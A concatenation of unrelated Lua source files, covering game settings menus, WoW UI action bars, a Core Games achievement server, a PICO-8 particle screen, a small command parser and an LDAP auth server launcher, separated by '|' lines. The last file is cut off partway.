--51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
--------------------------------------------------------------------------------
local labels = {
leaves = {
fgettext("Opaque Leaves"),
fgettext("Simple Leaves"),
fgettext("Fancy Leaves")
},
node_highlighting = {
fgettext("Node Outlining"),
fgettext("Node Highlighting"),
fgettext("None")
},
filters = {
fgettext("No Filter"),
fgettext("Bilinear Filter"),
fgettext("Trilinear Filter")
},
mipmap = {
fgettext("No Mipmap"),
fgettext("Mipmap"),
fgettext("Mipmap + Aniso. Filter")
},
antialiasing = {
fgettext("None"),
fgettext("2x"),
fgettext("4x"),
fgettext("8x")
}
}
local dd_options = {
leaves = {
table.concat(labels.leaves, ","),
{"opaque", "simple", "fancy"}
},
node_highlighting = {
table.concat(labels.node_highlighting, ","),
{"box", "halo", "none"}
},
filters = {
table.concat(labels.filters, ","),
{"", "bilinear_filter", "trilinear_filter"}
},
mipmap = {
table.concat(labels.mipmap, ","),
{"", "mip_map", "anisotropic_filter"}
},
antialiasing = {
table.concat(labels.antialiasing, ","),
{"0", "2", "4", "8"}
}
}
local getSettingIndex = {
Leaves = function()
local style = core.settings:get("leaves_style")
for idx, name in pairs(dd_options.leaves[2]) do
if style == name then return idx end
end
return 1
end,
NodeHighlighting = function()
local style = core.settings:get("node_highlighting")
for idx, name in pairs(dd_options.node_highlighting[2]) do
if style == name then return idx end
end
return 1
end,
Filter = function()
if core.settings:get(dd_options.filters[2][3]) == "true" then
return 3
elseif core.settings:get(dd_options.filters[2][3]) == "false" and
core.settings:get(dd_options.filters[2][2]) == "true" then
return 2
end
return 1
end,
Mipmap = function()
if core.settings:get(dd_options.mipmap[2][3]) == "true" then
return 3
elseif core.settings:get(dd_options.mipmap[2][3]) == "false" and
core.settings:get(dd_options.mipmap[2][2]) == "true" then
return 2
end
return 1
end,
Antialiasing = function()
local antialiasing_setting = core.settings:get("fsaa")
for i = 1, #dd_options.antialiasing[2] do
if antialiasing_setting == dd_options.antialiasing[2][i] then
return i
end
end
return 1
end
}
local function antialiasing_fname_to_name(fname)
for i = 1, #labels.antialiasing do
if fname == labels.antialiasing[i] then
return dd_options.antialiasing[2][i]
end
end
return 0
end
local function dlg_confirm_reset_formspec(data)
return "size[8,3]" ..
"label[1,1;" .. fgettext("Are you sure to reset your singleplayer world?") .. "]" ..
"button[1,2;2.6,0.5;dlg_reset_singleplayer_confirm;" .. fgettext("Yes") .. "]" ..
"button[4,2;2.8,0.5;dlg_reset_singleplayer_cancel;" .. fgettext("No") .. "]"
end
local function dlg_confirm_reset_btnhandler(this, fields, dialogdata)
if fields["dlg_reset_singleplayer_confirm"] ~= nil then
local worldlist = core.get_worlds()
local found_singleplayerworld = false
for i = 1, #worldlist do
if worldlist[i].name == "singleplayerworld" then
found_singleplayerworld = true
gamedata.worldindex = i
end
end
if found_singleplayerworld then
core.delete_world(gamedata.worldindex)
end
core.create_world("singleplayerworld", 1)
worldlist = core.get_worlds()
found_singleplayerworld = false
for i = 1, #worldlist do
if worldlist[i].name == "singleplayerworld" then
found_singleplayerworld = true
gamedata.worldindex = i
end
end
end
this.parent:show()
this:hide()
this:delete()
return true
end
local function showconfirm_reset(tabview)
local new_dlg = dialog_create("reset_spworld",
dlg_confirm_reset_formspec,
dlg_confirm_reset_btnhandler,
nil)
new_dlg:set_parent(tabview)
tabview:hide()
new_dlg:show()
end
local function formspec(tabview, name, tabdata)
local tab_string =
"box[0,0;3.75,4.5;#999999]" ..
"checkbox[0.25,0;cb_smooth_lighting;" .. fgettext("Smooth Lighting") .. ";"
.. dump(core.settings:get_bool("smooth_lighting")) .. "]" ..
"checkbox[0.25,0.5;cb_particles;" .. fgettext("Particles") .. ";"
.. dump(core.settings:get_bool("enable_particles")) .. "]" ..
"checkbox[0.25,1;cb_3d_clouds;" .. fgettext("3D Clouds") .. ";"
.. dump(core.settings:get_bool("enable_3d_clouds")) .. "]" ..
"checkbox[0.25,1.5;cb_opaque_water;" .. fgettext("Opaque Water") .. ";"
.. dump(core.settings:get_bool("opaque_water")) .. "]" ..
"checkbox[0.25,2.0;cb_connected_glass;" .. fgettext("Connected Glass") .. ";"
.. dump(core.settings:get_bool("connected_glass")) .. "]" ..
"dropdown[0.25,2.8;3.5;dd_node_highlighting;" .. dd_options.node_highlighting[1] .. ";"
.. getSettingIndex.NodeHighlighting() .. "]" ..
"dropdown[0.25,3.6;3.5;dd_leaves_style;" .. dd_options.leaves[1] .. ";"
.. getSettingIndex.Leaves() .. "]" ..
"box[4,0;3.75,4.5;#999999]" ..
"label[4.25,0.1;" .. fgettext("Texturing:") .. "]" ..
"dropdown[4.25,0.55;3.5;dd_filters;" .. dd_options.filters[1] .. ";"
.. getSettingIndex.Filter() .. "]" ..
"dropdown[4.25,1.35;3.5;dd_mipmap;" .. dd_options.mipmap[1] .. ";"
.. getSettingIndex.Mipmap() .. "]" ..
"label[4.25,2.15;" .. fgettext("Antialiasing:") .. "]" ..
"dropdown[4.25,2.6;3.5;dd_antialiasing;" .. dd_options.antialiasing[1] .. ";"
.. getSettingIndex.Antialiasing() .. "]" ..
"label[4.25,3.45;" .. fgettext("Screen:") .. "]" ..
"checkbox[4.25,3.6;cb_autosave_screensize;" .. fgettext("Autosave screen size") .. ";"
.. dump(core.settings:get_bool("autosave_screensize")) .. "]" ..
"box[8,0;3.75,4.5;#999999]" ..
"checkbox[8.25,0;cb_shaders;" .. fgettext("Shaders") .. ";"
.. dump(core.settings:get_bool("enable_shaders")) .. "]"
if PLATFORM == "Android" then
tab_string = tab_string ..
"button[8,4.75;4.1,1;btn_reset_singleplayer;"
.. fgettext("Reset singleplayer world") .. "]"
else
tab_string = tab_string ..
"button[8,4.75;4,1;btn_change_keys;"
.. fgettext("Change keys") .. "]"
end
tab_string = tab_string ..
"button[0,4.75;4,1;btn_advanced_settings;"
.. fgettext("Advanced Settings") .. "]"
if core.settings:get("touchscreen_threshold") ~= nil then
tab_string = tab_string ..
"label[4.3,4.1;" .. fgettext("Touchthreshold (px)") .. "]" ..
"dropdown[3.85,4.55;3.85;dd_touchthreshold;0,10,20,30,40,50;" ..
((tonumber(core.settings:get("touchscreen_threshold")) / 10) + 1) .. "]"
end
if core.settings:get_bool("enable_shaders") then
tab_string = tab_string ..
"checkbox[8.25,0.5;cb_bumpmapping;" .. fgettext("Bump Mapping") .. ";"
.. dump(core.settings:get_bool("enable_bumpmapping")) .. "]" ..
"checkbox[8.25,1;cb_tonemapping;" .. fgettext("Tone Mapping") .. ";"
.. dump(core.settings:get_bool("tone_mapping")) .. "]" ..
"checkbox[8.25,1.5;cb_generate_normalmaps;" .. fgettext("Normal Mapping") .. ";"
.. dump(core.settings:get_bool("generate_normalmaps")) .. "]" ..
"checkbox[8.25,2;cb_parallax;" .. fgettext("Parallax Occlusion") .. ";"
.. dump(core.settings:get_bool("enable_parallax_occlusion")) .. "]" ..
"checkbox[8.25,2.5;cb_waving_water;" .. fgettext("Waving Water") .. ";"
.. dump(core.settings:get_bool("enable_waving_water")) .. "]" ..
"checkbox[8.25,3;cb_waving_leaves;" .. fgettext("Waving Leaves") .. ";"
.. dump(core.settings:get_bool("enable_waving_leaves")) .. "]" ..
"checkbox[8.25,3.5;cb_waving_plants;" .. fgettext("Waving Plants") .. ";"
.. dump(core.settings:get_bool("enable_waving_plants")) .. "]"
else
tab_string = tab_string ..
"tablecolumns[color;text]" ..
"tableoptions[background=#00000000;highlight=#00000000;border=false]" ..
"table[8.33,0.7;3.5,4;shaders;" ..
"#888888," .. fgettext("Bump Mapping") .. "," ..
"#888888," .. fgettext("Tone Mapping") .. "," ..
"#888888," .. fgettext("Normal Mapping") .. "," ..
"#888888," .. fgettext("Parallax Occlusion") .. "," ..
"#888888," .. fgettext("Waving Water") .. "," ..
"#888888," .. fgettext("Waving Leaves") .. "," ..
"#888888," .. fgettext("Waving Plants") .. "," ..
";1]"
end
return tab_string
end
--------------------------------------------------------------------------------
local function handle_settings_buttons(this, fields, tabname, tabdata)
if fields["btn_advanced_settings"] ~= nil then
local adv_settings_dlg = create_adv_settings_dlg()
adv_settings_dlg:set_parent(this)
this:hide()
adv_settings_dlg:show()
--mm_texture.update("singleplayer", current_game())
return true
end
if fields["cb_smooth_lighting"] then
core.settings:set("smooth_lighting", fields["cb_smooth_lighting"])
return true
end
if fields["cb_particles"] then
core.settings:set("enable_particles", fields["cb_particles"])
return true
end
if fields["cb_3d_clouds"] then
core.settings:set("enable_3d_clouds", fields["cb_3d_clouds"])
return true
end
if fields["cb_opaque_water"] then
core.settings:set("opaque_water", fields["cb_opaque_water"])
return true
end
if fields["cb_connected_glass"] then
core.settings:set("connected_glass", fields["cb_connected_glass"])
return true
end
if fields["cb_autosave_screensize"] then
core.settings:set("autosave_screensize", fields["cb_autosave_screensize"])
return true
end
if fields["cb_shaders"] then
if (core.settings:get("video_driver") == "direct3d8" or
core.settings:get("video_driver") == "direct3d9") then
core.settings:set("enable_shaders", "false")
gamedata.errormessage = fgettext("To enable shaders the OpenGL driver needs to be used.")
else
core.settings:set("enable_shaders", fields["cb_shaders"])
end
return true
end
if fields["cb_bumpmapping"] then
core.settings:set("enable_bumpmapping", fields["cb_bumpmapping"])
return true
end
if fields["cb_tonemapping"] then
core.settings:set("tone_mapping", fields["cb_tonemapping"])
return true
end
if fields["cb_generate_normalmaps"] then
core.settings:set("generate_normalmaps", fields["cb_generate_normalmaps"])
return true
end
if fields["cb_parallax"] then
core.settings:set("enable_parallax_occlusion", fields["cb_parallax"])
return true
end
if fields["cb_waving_water"] then
core.settings:set("enable_waving_water", fields["cb_waving_water"])
return true
end
if fields["cb_waving_leaves"] then
core.settings:set("enable_waving_leaves", fields["cb_waving_leaves"])
end
if fields["cb_waving_plants"] then
core.settings:set("enable_waving_plants", fields["cb_waving_plants"])
return true
end
if fields["btn_change_keys"] then
core.show_keys_menu()
return true
end
if fields["cb_touchscreen_target"] then
core.settings:set("touchtarget", fields["cb_touchscreen_target"])
return true
end
if fields["btn_reset_singleplayer"] then
showconfirm_reset(this)
return true
end
--Note dropdowns have to be handled LAST!
local ddhandled = false
for i = 1, #labels.leaves do
if fields["dd_leaves_style"] == labels.leaves[i] then
core.settings:set("leaves_style", dd_options.leaves[2][i])
ddhandled = true
end
end
for i = 1, #labels.node_highlighting do
if fields["dd_node_highlighting"] == labels.node_highlighting[i] then
core.settings:set("node_highlighting", dd_options.node_highlighting[2][i])
ddhandled = true
end
end
if fields["dd_filters"] == labels.filters[1] then
core.settings:set("bilinear_filter", "false")
core.settings:set("trilinear_filter", "false")
ddhandled = true
elseif fields["dd_filters"] == labels.filters[2] then
core.settings:set("bilinear_filter", "true")
core.settings:set("trilinear_filter", "false")
ddhandled = true
elseif fields["dd_filters"] == labels.filters[3] then
core.settings:set("bilinear_filter", "false")
core.settings:set("trilinear_filter", "true")
ddhandled = true
end
if fields["dd_mipmap"] == labels.mipmap[1] then
core.settings:set("mip_map", "false")
core.settings:set("anisotropic_filter", "false")
ddhandled = true
elseif fields["dd_mipmap"] == labels.mipmap[2] then
core.settings:set("mip_map", "true")
core.settings:set("anisotropic_filter", "false")
ddhandled = true
elseif fields["dd_mipmap"] == labels.mipmap[3] then
core.settings:set("mip_map", "true")
core.settings:set("anisotropic_filter", "true")
ddhandled = true
end
if fields["dd_antialiasing"] then
core.settings:set("fsaa",
antialiasing_fname_to_name(fields["dd_antialiasing"]))
ddhandled = true
end
if fields["dd_touchthreshold"] then
core.settings:set("touchscreen_threshold", fields["dd_touchthreshold"])
ddhandled = true
end
return ddhandled
end
return {
name = "settings",
caption = fgettext("Settings"),
cbf_formspec = formspec,
cbf_button_handler = handle_settings_buttons
}
|
local T, C, L = Tukui:unpack()
local ActionBars = T.ActionBars
local Movers = T.Movers
local NUM_ACTIONBAR_BUTTONS = NUM_ACTIONBAR_BUTTONS
local ceil = math.ceil
----------------------------------------------------------------
-- ActionBar4: Page 3 - Right ActionBar (slots 25 to 36)
----------------------------------------------------------------
local baseCreateBar4 = ActionBars.CreateBar4
function ActionBars:CreateBar4()
-- first, we call the base function
baseCreateBar4(self)
-- second, we edit it
if (not C.ActionBars.RightBar) then return end
local ActionBar4 = ActionBars.Bars.Bar4
local MultiBarRight = MultiBarRight
local Size = C.ActionBars.NormalButtonSize
local Spacing = C.ActionBars.ButtonSpacing
local ButtonsPerRow = C.ActionBars.Bar4ButtonsPerRow
local NumButtons = C.ActionBars.Bar4NumButtons
local Offset = (C.ActionBars.ShowBackdrop) and (Spacing + 1) or 0
if (NumButtons <= ButtonsPerRow) then
ButtonsPerRow = NumButtons
end
local NumRow = ceil(NumButtons / ButtonsPerRow)
local Width, Height = ActionBars.GetBackgroundSize(ButtonsPerRow, NumRow, Size, Spacing, C.ActionBars.ShowBackdrop)
ActionBar4:ClearAllPoints()
ActionBar4:SetWidth(Width)
ActionBar4:SetHeight(Height)
if (C.ActionBars.VerticalRightBars) then
ActionBar4:SetPoint("RIGHT", UIParent, "RIGHT", -C.Lua.ScreenMargin, ceil(-Height / 2) + 7)
else
ActionBar4:SetPoint("RIGHT", UIParent, "RIGHT", -C.Lua.ScreenMargin, 5)
end
if (C.ActionBars.ShowBackdrop) then
ActionBar4:SetBackdropTransparent()
ActionBar4.Shadow:Kill()
end
local NumPerRows = ButtonsPerRow
local NextRowButtonAnchor = _G["MultiBarRightButton1"]
for i = 1, NUM_ACTIONBAR_BUTTONS do
local Button = _G["MultiBarRightButton"..i]
local PreviousButton = _G["MultiBarRightButton"..i-1]
Button:SetSize(Size, Size)
Button:ClearAllPoints()
Button:SetAttribute("showgrid", 1)
Button:ShowGrid(ACTION_BUTTON_SHOW_GRID_REASON_EVENT)
ActionBars:SkinButton(Button)
if i <= NumButtons then
if (i == 1) then
Button:SetPoint("TOPLEFT", ActionBar4, "TOPLEFT", Offset, -Offset)
elseif (i == NumPerRows + 1) then
Button:SetPoint("TOPLEFT", NextRowButtonAnchor, "BOTTOMLEFT", 0, -Spacing)
NumPerRows = NumPerRows + ButtonsPerRow
NextRowButtonAnchor = _G["MultiBarRightButton"..i]
else
Button:SetPoint("LEFT", PreviousButton, "RIGHT", Spacing, 0)
end
else
Button:SetPoint("TOP", UIParent, "TOP", 0, 200)
end
end
end
|
-- Physics Abstraction Layer Premake (c) Adrian Boeing 2007
-- PAL : http://pal.sourceforge.net/
-- premake : http://premake.sourceforge.net/
--====================================
--set the library location (where ode, bullet, tokamak, etc. live)
if (windows) then
lloc = "$(LIB_DIR)/"
else
lloc = "../../" --edit this line for your platform!
end
dirTokamak = lloc .. "tokamak/"
dirTrueAxis = lloc .. "TrueAxisPhysicsSDKNonCommercial/"
dirODE = lloc .. "ODE/"
dirNovodex = lloc .. "PhysX/"
dirNewton = lloc .. "NewtonSDK/sdk/"
dirJiggle = lloc .. "jiglib/"
dirBullet = lloc .. "bullet/"
dirIBDS = lloc .. "IBDS/"
dirSPE = lloc .. "SPE_SDK/"
dirOpenTissue = lloc .. "opentissue/"
make_bullet = true
make_ibds = true
make_jiggle = true
make_newton = true
make_novodex = true
make_ode = true
make_opentissue = true
make_spe = true
make_trueaxis = true
make_tokamak = true
use_qhull = true
static_example = false
dofile("premake_template.lua")
|
function zoo_init()
zoo_particles = {
{make_moveable(vec(20,30)), kSPR_PROTON_R, "proton"},
{make_moveable(vec(60,30)), kSPR_PIP_R, "pion+"},
{make_moveable(vec(100,30)), kSPR_PIM_R, "pion-"},
{make_moveable(vec(20,60)), kSPR_MU_R, "muon"},
{make_moveable(vec(60,60)), kSPR_NU_R, "neutrino"},
}
GAME_STATES[STATE][2] = false
part_selected = 1
zoo_time = 0
end
function zoo_update(transitioning)
zoo_time += FSPEED
if (btnp(4) and not transitioning) STATE = 1
local ch = 0
if(btnp(2)) ch -= 1
if(btnp(3)) ch += 1
if(ch != 0) then
part_selected = clamp(part_selected + ch, 1, #zoo_particles)
zoo_time = 0
end
end
function draw_card(spr_id, facts)
local kSPR_CRNR = 55
local kSPR_EDGET = 56
local kSPR_EDGEL = 71
vspr(kSPR_CRNR, 30, 16, 1, 1)
vspr(kSPR_CRNR, 98, 16, 1, 1, true)
vspr(kSPR_CRNR, 30,104, 1, 1, false,true)
vspr(kSPR_CRNR, 98,104, 1, 1, true, true)
for i = 1, 12 do
vspr(kSPR_EDGET, 33 + 5 * i, 16)
vspr(kSPR_EDGET, 33 + 5 * i, 104,1,1,false,true)
end
for i = 1, 16 do
vspr(kSPR_EDGEL, 30, 19 + 5*i)
vspr(kSPR_EDGEL, 98, 19 + 5*i,1,1,true)
end
rectfill(34,20,94,100,kLGRAY)
palt(kBLACK, false)
palt(kDBLUE, true)
vspr(60,68, 36, 3,3)
vspr(spr_id, 64, 36, 3,3)
palt()
rectfill(34,50,94,96,kDGRAY)
print(facts.name, 50, 18, kBLACK)
print("mASS:", 37, 54, kWHITE)
print(facts.mass, 44, 60, kYELLOW)
-- print(facts.charge, 37, 60, kWHITE)
-- print(facts.discovered, 37, 66, kWHITE)
print("id: "..facts.pid, 64, 98, kBLACK)
end
function zoo_draw()
cls()
local spr_id = 57
local facts = {
name = "proton",
mass = "938 mEv/C^2",
charge = "+1",
discovered = "~1917",
pid = 2212
}
draw_card(spr_id,facts)
-- draw_grid()
-- for I = 1, #zoo_particles do
-- local P = zoo_particles[I]
-- P[1]:spr(P[2], kDBLUE)
-- print(P[3], P[1].pos.x - 4 - (#P[3]), P[1].pos.y-12,
-- (I == part_selected) and
-- (zoo_time < 0.5) and kWHITE or kSLATE)
-- zoo_time = zoo_time % 1
-- print("\131/\148 : select, \142: choose",8,116,kWHITE)
-- end
end
|
------------------------------------------------------------------------------------------------------------------------
-- Achievement System Server
-- Author Morticai (META) - (https://www.coregames.com/user/d1073dbcc404405cbef8ce728e53d380)
-- Date: 2021/4/26
-- Version 0.1.9-AF
------------------------------------------------------------------------------------------------------------------------
local ROOT = script:GetCustomProperty("AchievementSystem"):WaitForObject()
local isEnabled = ROOT:GetCustomProperty("Enabled")
if not isEnabled then
return
end
local shouldSaveProgress = ROOT:GetCustomProperty("SaveProgress")
local useSharedKey = ROOT:GetCustomProperty("UseSharedKey")
local keys = ROOT:GetCustomProperty("Keys"):WaitForObject()
local sharedKeyNetRef = keys:GetCustomProperty("Achievements")
------------------------------------------------------------------------------------------------------------------------
-- REQUIRES
------------------------------------------------------------------------------------------------------------------------
local ACH_API = require(script:GetCustomProperty("ACH_API"))
local CONST = require(script:GetCustomProperty("MetaAbilityProgressionConstants_API"))
------------------------------------------------------------------------------------------------------------------------
-- OBJECTS
------------------------------------------------------------------------------------------------------------------------
local ACHIEVEMENT_LIST = script:GetCustomProperty("Achievement_List"):WaitForObject()
local listeners = {}
local tankInfo = {}
------------------------------------------------------------------------------------------------------------------------
-- LOCAL FUNCTIONS
------------------------------------------------------------------------------------------------------------------------
local function IsValidPlayer(object)
return Object.IsValid(object) and object:IsA("Player")
end
local function SetPlayerFlags(player)
player.serverUserData.ACH_diedInRound = false
player.serverUserData.ACH_killCount = 0
end
local function OnRoundStart()
for _, player in ipairs(Game.GetPlayers()) do
ACH_API.ResetRepeatable(player)
SetPlayerFlags(player)
end
end
local function OnResourceChanged(player, resName, resAmt)
if resAmt == 0 then
return
end
end
local function PlayerKilled(player, target, weaponType, isHeadShot)
if player == target then
return
end
player.serverUserData.ACH_killCount =
player.serverUserData.ACH_killCount and player.serverUserData.ACH_killCount + 1 or 1
ACH_API.AddProgress(player, "ASKI", 1)
ACH_API.AddProgress(player, "ACLA", 1)
ACH_API.AddProgress(player, "AASS", 1)
ACH_API.AddProgress(player, "AWAR", 1)
target.serverUserData.ACH_killCredited = true
target.serverUserData.ACH_diedInRound = true
end
local function OnRoundEnd()
local teamOne = Game.GetTeamScore(1)
local teamTwo = Game.GetTeamScore(2)
for _, player in ipairs(Game.GetPlayers()) do --
if Object.IsValid(player) then
if not player.serverUserData.ACH_diedInRound then
ACH_API.UnlockAchievement(player, "AGLO")
end
local tankType = player.serverUserData.currentTankData and player.serverUserData.currentTankData.type
if tankType then
-- Tank Type based achievements
if tankType == CONST.TANK_TYPE_NAME[CONST.TANK_TYPE.LIGHT] then
ACH_API.AddProgress(player, "ALP", 1)
ACH_API.AddProgress(player, "ASP", 1)
ACH_API.AddProgress(player, "ALCOM", 1)
elseif tankType == CONST.TANK_TYPE_NAME[CONST.TANK_TYPE.MEDIUM] then
ACH_API.AddProgress(player, "AMP", 1)
ACH_API.AddProgress(player, "AMS", 1)
ACH_API.AddProgress(player, "AMC", 1)
elseif tankType == CONST.TANK_TYPE_NAME[CONST.TANK_TYPE.HEAVY] then
ACH_API.AddProgress(player, "AHP", 1)
ACH_API.AddProgress(player, "AHS", 1)
ACH_API.AddProgress(player, "AHC", 1)
elseif tankType == CONST.TANK_TYPE_NAME[CONST.TANK_TYPE.TANKDESTROYER] then
ACH_API.AddProgress(player, "ADP", 1)
ACH_API.AddProgress(player, "ADS", 1)
ACH_API.AddProgress(player, "ADC", 1)
end
end
player.serverUserData.ACH_killCount = 0
player.serverUserData.ACH_diedInRound = false
Task.Wait()
if shouldSaveProgress and Object.IsValid(player) then
ACH_API.SaveAchievementStorage(player, useSharedKey, sharedKeyNetRef)
end
end
end
end
local function OnPlayerRespawn(player)
player.serverUserData.ACH_killCredited = false
player.serverUserData.ACH_diedInRound = true
end
------------------------------------------------------------------------------------------------------------------------
-- GLOBAL FUNCTIONS
------------------------------------------------------------------------------------------------------------------------
function OnPlayerDied(attackData)
local target = attackData.object
local source = attackData.source
if IsValidPlayer(source) and IsValidPlayer(target) then
if (target.isDead) and not target.serverUserData.ACH_killCredited then
PlayerKilled(source, target)
end
end
end
function OnRewardCollected(player, id)
ACH_API.GiveRewards(player, id)
end
function OnPlayerJoined(player)
if shouldSaveProgress then
ACH_API.LoadAchievementStorage(player, useSharedKey, sharedKeyNetRef)
end
listeners[player.id] = {}
--listeners[player.id]["Respawn"] = player.spawnedEvent:Connect(OnPlayerRespawn)
listeners[player.id]["Resource"] = player.resourceChangedEvent:Connect(OnResourceChanged)
SetPlayerFlags(player)
end
function OnPlayerLeft(player)
if shouldSaveProgress then
ACH_API.SaveAchievementStorage(player, useSharedKey, sharedKeyNetRef)
end
if listeners[player.id] then
for _, listener in pairs(listeners[player.id]) do
listener:Disconnect()
end
listeners[player.id] = nil
end
tankInfo[player] = nil
end
function OnUpgrade(player, tankId, upgradeSlot)
ACH_API.UnlockAchievement(player, "ANU")
for i, tank in ipairs(player.serverUserData.techTreeProgress) do
if (tank.id == tankId) then
if
tank.weaponProgress == CONST.UPGRADE_PROGRESS.PURCHASED and
tank.armorProgress == CONST.UPGRADE_PROGRESS.PURCHASED and
tank.engineProgress == CONST.UPGRADE_PROGRESS.PURCHASED
then
ACH_API.UnlockAchievement(player, "ATE")
end
end
end
end
function OnDamageTaken(attackData)
local target = attackData.object
local source = attackData.source
local hasTag = attackData.tags and attackData.tags.id
if hasTag and IsValidPlayer(source) and IsValidPlayer(target) then
if attackData.tags.id == "Projectile" then
source:AddResource(CONST.COMBAT_STATS.TOTAL_SHOTS_HIT, 1)
end
end
end
function OnTankAcquired(player, tankId, teir)
if teir == 2 then
ACH_API.AddProgress(player, "AJUN", 1)
elseif teir == 3 then
ACH_API.AddProgress(player, "AMED", 1)
elseif teir == 4 then
ACH_API.AddProgress(player, "ALEN", 1)
end
for i, tank in ipairs(player.serverUserData.techTreeProgress) do
if (tank.id == tankId) then
if
tank.weaponProgress == CONST.UPGRADE_PROGRESS.PURCHASED and
tank.armorProgress == CONST.UPGRADE_PROGRESS.PURCHASED and
tank.engineProgress == CONST.UPGRADE_PROGRESS.PURCHASED
then
ACH_API.UnlockAchievement(player, "ATE")
end
end
end
end
function OnBurntTank(player)
end
function OnRammedTank(player)
end
function OnDamageTurret(player)
end
function OnDamageBarrel(player)
end
------------------------------------------------------------------------------------------------------------------------
-- LISTENERS
------------------------------------------------------------------------------------------------------------------------
Game.playerJoinedEvent:Connect(OnPlayerJoined)
Game.playerLeftEvent:Connect(OnPlayerLeft)
Game.roundEndEvent:Connect(OnRoundEnd)
Game.roundStartEvent:Connect(OnRoundStart)
--Events.Connect("ACH_VICTORY", OnRoundEnd)
-- Server (Same Context) Broadcast Listeners
--Events.Connect("CombatWrapAPI.GoingToTakeDamage", OnGoingToTakeDamage)
Events.Connect("CombatWrapAPI.OnDamageTaken", OnDamageTaken)
Events.Connect("CombatWrapAPI.ObjectHasDied", OnPlayerDied)
Events.Connect("UpgradeAcquired", OnUpgrade)
Events.Connect("TankAcquired", OnTankAcquired)
-- From tank controller
Events.Connect("PlayerBurntTank", OnBurntTank)
Events.Connect("PlayerRammedTank" , OnRammedTank)
Events.Connect("PlayerDamageTurret", OnDamageTurret)
Events.Connect("PlayerDamageBarrel", OnDamageBarrel)
-- Client Broadcast Listeners
Events.ConnectForPlayer("AS.RewardClaim", OnRewardCollected)
ACH_API.RegisterAchievements(ACHIEVEMENT_LIST)
|
rawPlusJpeg:extractJpegs( "Extract Jpegs" )
return true
|
local Action = require "action"
local Consume = require "actions/consume"
local Drink = Consume:extend()
Drink.name = "eat"
Drink.targets = {targets.Item}
function Drink:perform(level)
Consume.perform(self, level)
end
return Drink
|
local Stack = require('lib.Stack')
local function table_has(table, value)
for _, val in ipairs(table) do
if val == value then
return true
end
end
return false
end
local function newCommand(command, parent)
local obj = { value = command, next = nil }
if parent then
parent.next = obj
end
return obj
end
local function parse(rawScript)
local commands = {}
local current = 1
local command = nil
local nextToken = string.gmatch(rawScript or '', "[%a_]+")
local ifStack = Stack:new()
local loopStack = Stack:new()
while true do
local token = nextToken()
if not token then
break
end
if table_has({ 'forward', 'backward', 'left', 'right', 'open' },
token) then
command = newCommand(token, command)
commands[current] = command
current = current + 1
elseif table_has({'ifexit', 'ifstart'}, token) then
command = newCommand(token, command)
commands[current] = command
current = current + 1
command.exit = newCommand('endif', command)
commands[current] = command.exit
current = current + 1
command.elseBranch = newCommand('else', nil)
commands[current] = command.elseBranch
command.elseBranch.next = command.exit
current = current + 1
command.thenBranch = newCommand('then', nil)
commands[current] = command.thenBranch
command.thenBranch.next = command.exit
current = current + 1
ifStack:push(command)
command = command.thenBranch
elseif token == 'else' then
local ifcond = ifStack:top()
if not ifcond then
return nil
end
command.next = ifcond.exit
command = ifcond.elseBranch
elseif token == 'endif' then
local ifcond = ifStack:top()
if not ifcond then
return nil
end
ifStack:pop()
if command then
command.next = ifcond.exit
end
command = ifcond.exit
elseif token == 'loop' then
command = newCommand(token, command)
commands[current] = command
current = current + 1
loopStack:push(command)
command.exit = newCommand('endloop', nil)
commands[current] = command.exit
current = current + 1
elseif token == 'endloop' then
local loop = loopStack:top()
if not loop then
return nil
end
if command then
command.next = loop
end
command = loop.exit
loopStack:pop()
elseif token == 'break' then
local loop = loopStack:top()
if not loop then
return nil
end
command = newCommand(token, command)
commands[current] = command
current = current + 1
command.next = loop.exit
command = nil
else -- unknown token
return nil
end
end
if ifStack:top() then
return nil
end
commands.top = commands[1]
return commands
end
return {
parse = parse,
}
|
function Client_GameRefresh(game)
if game.Game.TurnNumber > 0 then return end; -- don't pop up in ongoing games, could be removed later
if (game.Us ~= nil) then
UI.Alert(game.Us)
end
if not Mod.PlayerGameData.InitialPopupDisplayed then
UI.Alert("This game includes Swap Picks Mod - you pick for your opponent. Good luck :)")
local payload = {};
payload.Message = "InitialPopupDisplayed";
game.SendGameCustomMessage("Please wait... ", payload, function(reply)end);
end
end
|
#!/usr/bin/env luajit
local posix = require'posix'
local lfs = require'lfs'
local exit = os.exit
local getenv = os.getenv
local etlua = require'etlua'
local function format_table(tab,ind)
local str = '{\n'
for k,v in pairs(tab) do
if v then
local kt = type(k)
if kt == 'string' then
str = str .. string.rep(' ',ind) .. " ['" .. k .. "']="
elseif kt == 'number' then
str = str .. string.rep(' ',ind) .. ' [' .. k .. ']='
end
local t = type(v)
if(t == "string") then
str = str .. '"' .. v .. '",\n'
elseif(t == "number") then
str = str .. v .. ',\n'
elseif(t == 'table') then
str = str .. format_table(v,ind+2) .. ',\n'
end
end
end
str = str .. string.rep(' ',ind) .. '}'
return str
end
local script_dir = posix.dirname(posix.dirname(posix.realpath(arg[0])))
posix.chdir(script_dir)
local mod_name = 'etc.config'
if arg[1] then
mod_name = arg[1]
end
local ok, config = pcall(require,mod_name)
if not ok then
print("Error: could not load " .. mod_name)
exit(1)
end
if not config.nginx then
print("Error: please provide path to nginx in config")
exit(1)
end
if not config.ldap_base then
print("Error: missing ldap search base (ldap_base)")
exit(1)
end
if not config.ldap_filter then
print("Error: missing ldap search filter (ldap_filter)")
exit(1)
end
if not config.log_level then
config.log_level = "error";
end
if not config.work_dir then
config.work_dir = getenv("HOME") .. "/.ldap-auth-server"
end
if not config.listen then
config.listen = "127.0.0.1:8080"
end
if not config.worker_processes then
config.worker_processes = 1
end
if not config.ldap_host then
config.ldap_host = "127.0.0.1:389"
end
if not config.expire_time then
config.expire_time = 60;
end
if not lfs.attributes(config.work_dir) then
lfs.mkdir(config.work_dir)
end
if not lfs.attributes(config.work_dir .. "/logs") then
lfs.mkdir(config.work_dir .. "/logs")
end
local lof = io.open(config.work_dir .. "/config.lua", "wb")
lof:write("return " .. format_table(config,0))
-- lof:write("return {\n")
-- for k,v in pairs(config) do
-- if v then
-- local t = type(v)
-- if(t == "string") then
-- lof:write(' ' .. k ..'="' .. v .. '";\n')
-- elseif(t == "number") then
-- lof:write(' ' .. k ..'=' .. v .. ';\n')
-- end
-- end
-- end
-- lof:write("}\n")
lof:close()
config.lua_package_path = package.path;
config.lua_package_cpath = package.cpath;
local nf = io.open(script_dir .. "/res/nginx.conf","rb")
local nginx_config_template = nf:read("*all")
nf:close()
local template = etlua.compile(nginx_config_template)
